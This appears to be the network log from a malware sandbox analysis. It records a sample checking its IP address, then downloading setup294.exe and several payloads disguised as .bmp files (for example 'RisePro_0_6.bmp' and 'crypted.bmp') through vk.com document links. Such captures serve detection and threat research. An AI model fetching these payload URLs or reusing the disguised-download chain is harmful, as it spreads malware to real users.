Network Analysis

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: api.myip.com

HTTP/1.1 200 OK Date: Wed, 13 Sep 2023 07:56:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YSsRA4NpZBIaT5tzRBlDyaOvxMEUmP0c2%2B%2BzMXv1DcXosLxh3Gaj3KWh37Tr%2BCgRZG2mIiiT0YjMwls14l5Wv7tVw8gjgeKalU%2FtA0PlQA5RlMPsnCN2r11jvFZVTA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 805ed53b4c988310-KIX

GET /doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache

HTTP/1.1 200 OK Server: kittenx Date: Wed, 13 Sep 2023 07:56:24 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 305705 Connection: keep-alive X-Powered-By: KPHP/7.4.114588 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixlang=17; expires=Fri, 06 Sep 2024 00:15:32 GMT; path=/; domain=.vk.com Set-Cookie: remixstlid=9082464214106048604_KjidT99ibf6Z0JqExo6BwZpGoZ3ahzdaMgd0EhroZiz; expires=Thu, 12 Sep 2024 07:56:24 GMT; path=/; domain=.vk.com; secure Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Set-Cookie: remixlgck=9eda2155fb49fb374c; expires=Wed, 11 Sep 2024 11:40:11 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstid=81511060_AsNQWjmO4VrWlRCxFvZHqcEfGRpdRb203DCSYqaosS8; expires=Tue, 10 Sep 2024 16:40:28 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /setup294.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: preconcert.pw Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 13 Sep 2023 07:56:28 GMT Content-Type: application/x-msdos-program Content-Length: 3175355 Connection: keep-alive Last-Modified: Wed, 13 Sep 2023 06:33:51 GMT ETag: "3073bb-60537be1a51c0" Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 4306 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iiXhbv3DWuCppgCNH50QT0pnxKwtMZ7F9oJofZIKsp%2F74yNwxEhXKeQT6%2BhxxXiPUHxZBivuI4f6%2FBfJEtDJEYFC2WtB%2ByGum3cnhjaQyil096pNmghQ2tb%2BInBXRoXh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 805ed575aa5219c9-KIX alt-svc: h3=":443"; ma=86400

GET /doc791620691_663065029?hash=Efubo9FQtw3Bdj42XJVcJwymfIH3PazMKz8g5wJ0dZX&dl=G44TCNRSGA3DSMI:1682787066:QgrgzF33wDt9bwmmOgWCYTv61J7HwhLVZOXGaEdWiKP&api=1&no_preview=1#stats HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9082464214106048604_KjidT99ibf6Z0JqExo6BwZpGoZ3ahzdaMgd0EhroZiz; remixlgck=9eda2155fb49fb374c; remixstid=81511060_AsNQWjmO4VrWlRCxFvZHqcEfGRpdRb203DCSYqaosS8

HTTP/1.1 200 OK Server: kittenx Date: Wed, 13 Sep 2023 07:56:37 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 305721 Connection: keep-alive X-Powered-By: KPHP/7.4.114588 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline' X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc17799268_667301259?hash=mz2nLKvo6dt1uE06v4jRORCgXO1tbK1pSlJhEfMFJco&dl=vkt89M90dzWpJZ9hvFWUTeZuZHqaxeSpP8mP7ffY8Z0&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9082464214106048604_KjidT99ibf6Z0JqExo6BwZpGoZ3ahzdaMgd0EhroZiz; remixlgck=9eda2155fb49fb374c; remixstid=81511060_AsNQWjmO4VrWlRCxFvZHqcEfGRpdRb203DCSYqaosS8

HTTP/1.1 302 Found Server: kittenx Date: Wed, 13 Sep 2023 07:56:38 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114588 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-21.userapi.com/c235131/u17799268/docs/d34/20a2f6c4d3f4/d3232adg.bmp?extra=suUcIL34C8tZuA415Q8lnsWylAKtf3SORQHWwTtRCAhor9Xh31vJ6M2BmK67YddRXGwiLAW0jvq_FoA4Id_CzGfizeXTtd7lsFd1NrUnyhtFzoxZ9_XyQPBa1ZY9ol22CvDvWfKJysaOOqpn X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c235131/u17799268/docs/d34/20a2f6c4d3f4/d3232adg.bmp?extra=suUcIL34C8tZuA415Q8lnsWylAKtf3SORQHWwTtRCAhor9Xh31vJ6M2BmK67YddRXGwiLAW0jvq_FoA4Id_CzGfizeXTtd7lsFd1NrUnyhtFzoxZ9_XyQPBa1ZY9ol22CvDvWfKJysaOOqpn HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-21.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Wed, 13 Sep 2023 07:56:39 GMT Content-Type: image/x-ms-bmp Content-Length: 349188 Connection: keep-alive Last-Modified: Tue, 12 Sep 2023 16:44:29 GMT ETag: "6500956d-55404" Expires: Fri, 13 Oct 2023 07:56:39 GMT Cache-Control: max-age=2592000 X-Frontend: front6-21 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /doc17799268_667281004?hash=xOqcu1ZGarivubW5PP3sEBGynm7PLhU3P4kzSjNpUgz&dl=BDGaIhRFJdbZh0HkjSHVN3oPAh2dusZaaZGmKdcx4h8&api=1&no_preview=1#1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9082464214106048604_KjidT99ibf6Z0JqExo6BwZpGoZ3ahzdaMgd0EhroZiz; remixlgck=9eda2155fb49fb374c; remixstid=81511060_AsNQWjmO4VrWlRCxFvZHqcEfGRpdRb203DCSYqaosS8

HTTP/1.1 302 Found Server: kittenx Date: Wed, 13 Sep 2023 07:56:40 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114588 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-20.userapi.com/c237331/u17799268/docs/d32/20d06de2d171/crypted.bmp?extra=Ix6P6PHPTaU-Y3IcBr-4XYzVARL6dIIfwVgGD1PgAHnQ8YE8I6mxpzvBb8ZC-5spd3ReZ1Yx-dQbztud3MKZLNEYdKKzb49L34FiqbZHziCi8D6pAzz-wEYZ9qJs6eJrhDDttVXq_XHjBjXh X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c237331/u17799268/docs/d32/20d06de2d171/crypted.bmp?extra=Ix6P6PHPTaU-Y3IcBr-4XYzVARL6dIIfwVgGD1PgAHnQ8YE8I6mxpzvBb8ZC-5spd3ReZ1Yx-dQbztud3MKZLNEYdKKzb49L34FiqbZHziCi8D6pAzz-wEYZ9qJs6eJrhDDttVXq_XHjBjXh HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-20.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Wed, 13 Sep 2023 07:56:41 GMT Content-Type: image/x-ms-bmp Content-Length: 430596 Connection: keep-alive Last-Modified: Tue, 12 Sep 2023 10:36:35 GMT ETag: "65003f33-69204" Expires: Fri, 13 Oct 2023 07:56:41 GMT Cache-Control: max-age=2592000 X-Frontend: front6-20 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /doc791620691_663065029?hash=Efubo9FQtw3Bdj42XJVcJwymfIH3PazMKz8g5wJ0dZX&dl=G44TCNRSGA3DSMI:1682787066:QgrgzF33wDt9bwmmOgWCYTv61J7HwhLVZOXGaEdWiKP&api=1&no_preview=1#test HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9082464214106048604_KjidT99ibf6Z0JqExo6BwZpGoZ3ahzdaMgd0EhroZiz; remixlgck=9eda2155fb49fb374c; remixstid=81511060_AsNQWjmO4VrWlRCxFvZHqcEfGRpdRb203DCSYqaosS8; remixir=1

HTTP/1.1 200 OK Server: kittenx Date: Wed, 13 Sep 2023 07:56:48 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 305720 Connection: keep-alive X-Powered-By: KPHP/7.4.114588 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc44017378_669136690?hash=E5ro6HNAOZHVOgZiTIDkvKctXbILQ0zBBx6f8KGt5e8&dl=qG39A2bhq4t9EZmEY5oWbCHZP2L9kp7Offbq4R5FDD0&api=1&no_preview=1#test2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9082464214106048604_KjidT99ibf6Z0JqExo6BwZpGoZ3ahzdaMgd0EhroZiz; remixlgck=9eda2155fb49fb374c; remixstid=81511060_AsNQWjmO4VrWlRCxFvZHqcEfGRpdRb203DCSYqaosS8; remixir=1

HTTP/1.1 302 Found Server: kittenx Date: Wed, 13 Sep 2023 07:56:52 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114588 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-21.userapi.com/c236331/u44017378/docs/d17/0cb048202b81/test2.bmp?extra=1Z4SkXT15ewB-UA3sFqN7g8-pGRPBmHUxDc7mOUzzckJf0vnNywnckSgPgETcI68TPa1hHTz6venXZc0d25yILYNDtXVUYrb671M_1Q5gngn8dxEey7xbFXNAr9MzoXeWv8HqjRyqYSShMt7 X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c236331/u44017378/docs/d17/0cb048202b81/test2.bmp?extra=1Z4SkXT15ewB-UA3sFqN7g8-pGRPBmHUxDc7mOUzzckJf0vnNywnckSgPgETcI68TPa1hHTz6venXZc0d25yILYNDtXVUYrb671M_1Q5gngn8dxEey7xbFXNAr9MzoXeWv8HqjRyqYSShMt7 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-21.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Wed, 13 Sep 2023 07:56:52 GMT Content-Type: image/x-ms-bmp Content-Length: 758276 Connection: keep-alive Last-Modified: Sun, 10 Sep 2023 12:48:11 GMT ETag: "64fdbb0b-b9204" Expires: Fri, 13 Oct 2023 07:56:52 GMT Cache-Control: max-age=2592000 X-Frontend: front6-21 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /doc17799268_667305233?hash=IwZ8VZSm1R6poDSVmCjMBWvPwtTOZjN00hLIt20AnZP&dl=X47BBpvy39XAmpGvpAPzZxZ3QV8ZssYZktFDfFk2wpg&api=1&no_preview=1#cryp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9082464214106048604_KjidT99ibf6Z0JqExo6BwZpGoZ3ahzdaMgd0EhroZiz; remixlgck=9eda2155fb49fb374c; remixstid=81511060_AsNQWjmO4VrWlRCxFvZHqcEfGRpdRb203DCSYqaosS8; remixir=1

HTTP/1.1 302 Found Server: kittenx Date: Wed, 13 Sep 2023 07:56:52 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114588 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-23.userapi.com/c909218/u17799268/docs/d56/c3e409803ba2/deluxe_crypted.bmp?extra=GRXXFXl5hs6qKc2oTNeNbZabyhRErvV9i7w4yu2Mor6fdrgHIzKkCogIMG6LyZkta06QOXjobPsItw5FUV_MCjbxh9Ezbijg7-6iXGOD57ERI0MdAdzyAYqyWSfRh7JIr3kt-a20Yh6GOLqB X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c909218/u17799268/docs/d56/c3e409803ba2/deluxe_crypted.bmp?extra=GRXXFXl5hs6qKc2oTNeNbZabyhRErvV9i7w4yu2Mor6fdrgHIzKkCogIMG6LyZkta06QOXjobPsItw5FUV_MCjbxh9Ezbijg7-6iXGOD57ERI0MdAdzyAYqyWSfRh7JIr3kt-a20Yh6GOLqB HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-23.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Wed, 13 Sep 2023 07:56:53 GMT Content-Type: image/x-ms-bmp Content-Length: 668164 Connection: keep-alive Last-Modified: Tue, 12 Sep 2023 17:54:21 GMT ETag: "6500a5cd-a3204" Expires: Fri, 13 Oct 2023 07:56:53 GMT Cache-Control: max-age=2592000 X-Frontend: front6-23 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /doc44017378_669100051?hash=Y1d8yh89LcZ0zAOx8obl7JZ7mZWqNSdnCHqxRkQxKbD&dl=IZJ6qPZZJHdKI0zpkVZuoaMzdZItvl7ncz41tGh3PbP&api=1&no_preview=1#rise_cpp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9082464214106048604_KjidT99ibf6Z0JqExo6BwZpGoZ3ahzdaMgd0EhroZiz; remixlgck=9eda2155fb49fb374c; remixstid=81511060_AsNQWjmO4VrWlRCxFvZHqcEfGRpdRb203DCSYqaosS8; remixir=1

HTTP/1.1 302 Found Server: kittenx Date: Wed, 13 Sep 2023 07:56:54 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114588 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-23.userapi.com/c235131/u44017378/docs/d30/967fe3fc2ef3/RisePro_0_6.bmp?extra=fCMNoFyOc7enNdFTnnGhjJ9jovfZ0mMROPwFREaAqWboltaIPZdcP_dIqrizV6yOjKq30uHvRMolq-F_2Hpyxg0TezcFJ8SSm0bMWdfNeg7hd0DvCAOl6OyNPRiOzrjGNYBVqtSlXKW8w2lx X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc44017378_669048765?hash=4y9BzzNOTmmZPixDuggkZgFx4GZ0QVZg3tNSdZK5BRs&dl=GJoifTjG0klCvDa0fmGosGT2YiTbPX4KW0RXRQc7WGk&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9082464214106048604_KjidT99ibf6Z0JqExo6BwZpGoZ3ahzdaMgd0EhroZiz; remixlgck=9eda2155fb49fb374c; remixstid=81511060_AsNQWjmO4VrWlRCxFvZHqcEfGRpdRb203DCSYqaosS8; remixir=1

HTTP/1.1 302 Found Server: kittenx Date: Wed, 13 Sep 2023 07:56:54 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114588 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-23.userapi.com/c909328/u44017378/docs/d42/899872c35d72/BottClient.bmp?extra=7B_OrPq1kMJpKpU7Rrq-3WvxeXHPEz4A_JiKNweZAEbH6C3hrq8WC9Y6uww1t8xYlzYqcYdsDkXyICD53rigA_siFPMJTJC5COTUew0WnhO42M6ssRQgNTvC-a6uLFX3tMHI9cyZu49a-5Yt X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c235131/u44017378/docs/d30/967fe3fc2ef3/RisePro_0_6.bmp?extra=fCMNoFyOc7enNdFTnnGhjJ9jovfZ0mMROPwFREaAqWboltaIPZdcP_dIqrizV6yOjKq30uHvRMolq-F_2Hpyxg0TezcFJ8SSm0bMWdfNeg7hd0DvCAOl6OyNPRiOzrjGNYBVqtSlXKW8w2lx HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-23.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Wed, 13 Sep 2023 07:56:54 GMT Content-Type: image/x-ms-bmp Content-Length: 2975500 Connection: keep-alive Last-Modified: Sat, 09 Sep 2023 14:56:44 GMT ETag: "64fc87ac-2d670c" Expires: Fri, 13 Oct 2023 07:56:54 GMT Cache-Control: max-age=2592000 X-Frontend: front6-23 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /c909328/u44017378/docs/d42/899872c35d72/BottClient.bmp?extra=7B_OrPq1kMJpKpU7Rrq-3WvxeXHPEz4A_JiKNweZAEbH6C3hrq8WC9Y6uww1t8xYlzYqcYdsDkXyICD53rigA_siFPMJTJC5COTUew0WnhO42M6ssRQgNTvC-a6uLFX3tMHI9cyZu49a-5Yt HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-23.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Wed, 13 Sep 2023 07:56:55 GMT Content-Type: image/x-ms-bmp Content-Length: 2685972 Connection: keep-alive Last-Modified: Fri, 08 Sep 2023 11:50:11 GMT ETag: "64fb0a73-28fc14" Expires: Fri, 13 Oct 2023 07:56:55 GMT Cache-Control: max-age=2592000 X-Frontend: front6-23 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /doc44017378_668981261?hash=KtP4jlmfa5n21hEuywQIenzbdeHE6fN4MtKmM0s1LgP&dl=ogaN1GU0x5hbsmXLGfmQBkv0VN664AvXi2xyl1vLRkP&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9082464214106048604_KjidT99ibf6Z0JqExo6BwZpGoZ3ahzdaMgd0EhroZiz; remixlgck=9eda2155fb49fb374c; remixstid=81511060_AsNQWjmO4VrWlRCxFvZHqcEfGRpdRb203DCSYqaosS8

HTTP/1.1 302 Found Server: kittenx Date: Wed, 13 Sep 2023 07:56:57 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114588 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-23.userapi.com/c240331/u44017378/docs/d9/fa52acca0a25/PL_Client.bmp?extra=Gtk0NulK_t0Vg_w76xxYbYgKgQDrBcgCJoJgl3o3wL4Soyf9yXoN4y9JRWHxgfaYJkwVs046jyfvzE55PAyXiea2WR-q86s-1lM-sAnMQ1mOToUwfIvm5gd_Npnk_8d9vqhFfiSPARmxkQGX X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc17799268_667311648?hash=s3oUYZKI5aNSuInKy4BDLkFtjdygeDOMqfkbCpHaJtT&dl=3IzXh7BEz71lxp7j7y0p9JlCZth8IcFgVjQw3D577ks&api=1&no_preview=1#as HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9082464214106048604_KjidT99ibf6Z0JqExo6BwZpGoZ3ahzdaMgd0EhroZiz; remixlgck=9eda2155fb49fb374c; remixstid=81511060_AsNQWjmO4VrWlRCxFvZHqcEfGRpdRb203DCSYqaosS8; remixir=1

